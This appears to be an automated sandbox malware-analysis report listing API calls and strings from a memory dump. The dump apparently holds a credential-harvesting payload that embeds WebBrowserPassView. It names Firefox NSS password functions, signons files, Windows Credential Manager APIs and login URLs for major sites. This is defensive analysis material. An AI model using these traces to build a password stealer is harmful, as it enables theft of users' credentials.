• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
• API String ID: 1638525581-2103577948
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB20
  • Part of subcall function 0040FAFF: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
  • Part of subcall function 0040FAFF: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
  • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB90
  • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FB9D
  • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FBAC
  • Part of subcall function 0040FAFF: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
  • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
  • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
  • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
  • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
  • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
  • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
  • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
• memset.MSVCRT ref: 00406E17
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
• memset.MSVCRT ref: 00406E69
• memset.MSVCRT ref: 00406E81
• memset.MSVCRT ref: 00406E99
• memset.MSVCRT ref: 00406EB1
• wcslen.MSVCRT ref: 00406EBC
• wcslen.MSVCRT ref: 00406ECA
• wcslen.MSVCRT ref: 00406EF9
• wcslen.MSVCRT ref: 00406F07
• wcslen.MSVCRT ref: 00406F36
• wcslen.MSVCRT ref: 00406F44
• wcslen.MSVCRT ref: 00406F73
• wcslen.MSVCRT ref: 00406F81
• SetCurrentDirectoryW.KERNEL32(?), ref: 00407074
  • Part of subcall function 0040697E: memset.MSVCRT ref: 004069BD
  • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A3C
  • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A51
• API ID: memsetwcslen$AddressProc$CurrentDirectory$LibraryLoad$ByteCharHandleModuleMultiWide
• String ID: signons.sqlite$signons.txt$signons2.txt$signons3.txt
• API String ID: 1908949080-2435954524
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
• ??2@YAPAXI@Z.MSVCRT ref: 00441C46
• GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
• VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
• VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
• _snwprintf.MSVCRT ref: 00441CC6
• wcscpy.MSVCRT ref: 00441CF0
• ??3@YAXPAX@Z.MSVCRT ref: 00441DA0
• API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 1223191525-1542517562
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040C912
• memset.MSVCRT ref: 0040C927
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C970
• ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C97B
• SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
• ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
• ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
• SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
• GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
• LoadImageW.USER32 ref: 0040C9F8
• GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
• LoadImageW.USER32 ref: 0040CA15
• ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
• GetSysColor.USER32(0000000F), ref: 0040CA2E
• ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040CA49
• ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040CA59
• DeleteObject.GDI32(?), ref: 0040CA65
• DeleteObject.GDI32(?), ref: 0040CA6B
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040CA88
• API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 304928396-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004064AD
  • Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
• _wcsnicmp.MSVCRT ref: 00406520
• memset.MSVCRT ref: 00406544
• memset.MSVCRT ref: 00406560
• _snwprintf.MSVCRT ref: 00406580
• wcsrchr.MSVCRT ref: 004065A7
• CompareFileTime.KERNEL32(?,?,00000000), ref: 004065DA
• wcscpy.MSVCRT ref: 004065FC
• memset.MSVCRT ref: 004064FA
  • Part of subcall function 00411BFE: RegEnumKeyExW.ADVAPI32(00000000,0040FB38,0040FB38,?,00000000,00000000,00000000,0040FB38,0040FB38,00000000), ref: 00411C21
• RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
• wcscpy.MSVCRT ref: 00406642
• ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                                                                                                                                    • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                    • API String ID: 1094916163-2797892316
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
• GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-2887671607
Uniqueness
Uniqueness Score: -1.00%
APIs
• memset.MSVCRT ref: 0040BED5
• memset.MSVCRT ref: 0040BEFF
• memset.MSVCRT ref: 0040BF15
• memset.MSVCRT ref: 0040BF2B
• _snwprintf.MSVCRT ref: 0040BF64
• wcscpy.MSVCRT ref: 0040BFAF
• _snwprintf.MSVCRT ref: 0040C03C
• wcscat.MSVCRT ref: 0040C06E
  • Part of subcall function 0041248F: _snwprintf.MSVCRT ref: 004124B3
• wcscpy.MSVCRT ref: 0040C050
• _snwprintf.MSVCRT ref: 0040C0AD
  • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
  • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 1277802453-601624466
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C912
  • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C927
  • Part of subcall function 0040C8CF: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
  • Part of subcall function 0040C8CF: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
  • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
  • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
  • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
  • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
  • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
  • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
  • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040C9F8
  • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
  • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040CA15
  • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
  • Part of subcall function 0040C8CF: GetSysColor.USER32(0000000F), ref: 0040CA2E
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F4
• LoadIconW.USER32(00000000,00000072), ref: 004035FF
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403610
• GetModuleHandleW.KERNEL32(00000000), ref: 00403614
• LoadIconW.USER32(00000000,00000074), ref: 00403619
• ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403624
• GetModuleHandleW.KERNEL32(00000000), ref: 00403628
• LoadIconW.USER32(00000000,00000073), ref: 0040362D
• ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403638
• GetModuleHandleW.KERNEL32(00000000), ref: 0040363C
• LoadIconW.USER32(00000000,00000075), ref: 00403641
• ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 0040364C
• GetModuleHandleW.KERNEL32(00000000), ref: 00403650
• LoadIconW.USER32(00000000,0000006F), ref: 00403655
• ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00403660
• GetModuleHandleW.KERNEL32(00000000), ref: 00403664
• LoadIconW.USER32(00000000,00000076), ref: 00403669
• ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00403674
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Image$Icon$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 792915304-0
                                                                                                                                                    • Opcode ID: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                                                                                                                    • Instruction ID: 62ec96a61e35675a05b55f01cd8090f0511f6faf4d41b9404683e1d7d0c62212
                                                                                                                                                    • Opcode Fuzzy Hash: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                                                                                                                    • Instruction Fuzzy Hash: 6901E1A17957087AF53137B2EC4BF6B7B5EDF81F4AF214414F30C990E0C9A6AD105928
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000104,00000001,00000000,?,00407052,?,?,?,0000001E), ref: 00406BC8
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00406BDC
                                                                                                                                                      • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    • memset.MSVCRT ref: 00406C0B
                                                                                                                                                    • memset.MSVCRT ref: 00406C2B
                                                                                                                                                    • memset.MSVCRT ref: 00406C40
                                                                                                                                                    • strcmp.MSVCRT ref: 00406C64
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00406DC3
                                                                                                                                                    • CloseHandle.KERNEL32(Rp@,?,00407052,?,?,?,0000001E), ref: 00406DCC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Filememset$??2@??3@CloseCreateHandleReadSizestrcmp
                                                                                                                                                    • String ID: ---$Rp@
                                                                                                                                                    • API String ID: 2784192885-2834202798
                                                                                                                                                    • Opcode ID: 94eb7d45b3064e74519a59694890047dd7365216467f7798c66d5ee7b063cd76
                                                                                                                                                    • Instruction ID: 5360a5981a47af023619c2d52a4e150b55de9ab2e9c88b676a0c17dd944fe9c5
                                                                                                                                                    • Opcode Fuzzy Hash: 94eb7d45b3064e74519a59694890047dd7365216467f7798c66d5ee7b063cd76
                                                                                                                                                    • Instruction Fuzzy Hash: 2E51817290815DAAEF21DB558C819DEBBBCEF14304F1040FBE50AA3141DA389FD5DBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040AA6A
                                                                                                                                                    • memset.MSVCRT ref: 0040AA86
                                                                                                                                                      • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                                                                                                                      • Part of subcall function 00441C15: GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                                                                                                                      • Part of subcall function 00441C15: ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                                                                                                                      • Part of subcall function 00441C15: GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                                                                                                                      • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                                                                                                                      • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                                                                                                                      • Part of subcall function 00441C15: _snwprintf.MSVCRT ref: 00441CC6
                                                                                                                                                      • Part of subcall function 00441C15: wcscpy.MSVCRT ref: 00441CF0
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040AACA
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040AAD9
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040AAE9
                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040ABE8,00000004,0040A818,00000000), ref: 0040AB4E
                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040ABE8,00000005,0040A818,00000000), ref: 0040AB58
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040AB60
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                    • API String ID: 3037099051-517860148
                                                                                                                                                    • Opcode ID: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                                                                                                                    • Instruction ID: 9c0725b1fda07d439eb4652870f5b63d7404026a1df9010dc4cb7dda8e53314a
                                                                                                                                                    • Opcode Fuzzy Hash: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                                                                                                                    • Instruction Fuzzy Hash: 6D21807294021875E720B7529C46ECF7A6CAF40755F90447BF60CB20D2EAB85B948AAE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                                                                                                                    • API String ID: 2238633743-1621422469
                                                                                                                                                    • Opcode ID: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                                                                                                                    • Instruction ID: 1a4948e4bf817cd33749cdf205c6c1bb7532e39c1774f91cd0a649ea1cfd5687
                                                                                                                                                    • Opcode Fuzzy Hash: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                                                                                                                    • Instruction Fuzzy Hash: 18F0F475940744AAEB30AF769D49E06BEF0EFA8B027218D2EE1C1A3651D7B99240CE44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(psapi.dll,?,0040F921), ref: 00410D70
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00410D89
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410D9A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00410DAB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410DBC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00410DCD
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410DED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                    • API String ID: 2449869053-70141382
                                                                                                                                                    • Opcode ID: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                                                                                                                    • Instruction ID: 1ed5449ad40e57d8b224171af96504b1ffda3ff1f81db88aadee6c58e1c1cdad
                                                                                                                                                    • Opcode Fuzzy Hash: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                                                                                                                    • Instruction Fuzzy Hash: BB01B574A45312AEE7109B64FC40BFB2EA4B781B42B20403BE400D1396DBBCD8C29A6C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                    • Opcode ID: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                                                                                                                    • Instruction ID: 054bd0190cb9dfc881084e553ec7e2e67fad8357780775fa0482b63ba5cfd284
                                                                                                                                                    • Opcode Fuzzy Hash: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                                                                                                                    • Instruction Fuzzy Hash: 7101DE72ACA31138F83851672D17F971A598FA1B7AF70196FF514D81C6EEAC9000709D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040F928), ref: 00410CE8
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00410D01
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00410D12
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00410D23
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00410D34
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00410D45
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
• Instruction ID: 16f3a03532fd71bf7b987582fee040d1dd7fa58dea07b6b8c7b27d1037cf047a
• Opcode Fuzzy Hash: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
• Instruction Fuzzy Hash: 92F0F474605321A9A3108BA8BD00BA72FF86781F52B10013BED00D1266DBBCD8C29F7E
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040383E: FreeLibrary.KERNEL32(?,004037CB,00000000,00408635,?,00000000,?), ref: 00403845
• LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
• GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
• Opcode ID: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
• Instruction ID: c94656deef6b20b6b745ef32668947add9de3545ed3fb2bb9f52e7e7eb3e89f2
• Opcode Fuzzy Hash: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
• Instruction Fuzzy Hash: D9012C355007809AD730AF6AC809F06BEE4EF54B02B21886FF091A3791D7B9E240CF48
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
  • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
• memset.MSVCRT ref: 00403415
• memset.MSVCRT ref: 0040342A
• memset.MSVCRT ref: 0040343F
• _snwprintf.MSVCRT ref: 00403467
• wcscpy.MSVCRT ref: 00403483
• _snwprintf.MSVCRT ref: 004034C6
Strings
• WebBrowserPassView, xrefs: 004034AB
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004033EF
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040345A
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004034B9
• <table dir="rtl"><tr><td>, xrefs: 0040347D
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
